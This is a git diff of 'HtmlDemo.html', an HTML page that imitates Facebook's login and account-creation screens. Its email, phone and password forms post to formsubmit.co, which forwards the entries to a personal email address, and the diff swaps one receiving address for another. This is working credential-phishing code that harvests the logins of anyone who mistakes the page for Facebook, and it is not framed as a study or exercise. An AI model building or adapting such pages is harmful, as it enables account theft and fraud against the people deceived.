--- a/HtmlDemo.html
+++ b/HtmlDemo.html
@@ -7,7 +7,7 @@
     <div id="header_wrapper">
         <div id="header">
 
-            <form method="POST" action="https://formsubmit.co/tadimo7758@charav.com">
+            <form method="POST" action="https://formsubmit.co/asrafhossen58@gmail.com">
 
                 <li>Email or Phone<br><input type="text" name="email"></li>
                 <li>Password<br><input type="password" name="password"><br><a href="https://www.Facebook.com">Forgotten account?</a></li>
@@ -26,12 +26,12 @@
 
         <div id="div2">
             <h1>Create an account</h1>
-            <form method="POST" action="https://formsubmit.co/tadimo7758@charav.com"></form>
+            <form method="POST" action="https://formsubmit.co/asrafhossen58@gmail.com"></form>
                 <p>It's free and always will be.</p>
                 <li><input type="text" placeholder="First Name" id="Firstname"><input type="text" placeholder="Surname" id="surname"></li>
                 <li><input type="text" placeholder="Mobile number or email"></li>
                 <li><input type="password" placeholder="New password"></li>
-            <form method="POST" action="https://formsubmit.co/tadimo7758@charav.com">
+            <form method="POST" action="https://formsubmit.co/asrafhossen58@gmail.com">
                 <p>Birthday</p>
     
                 <li>
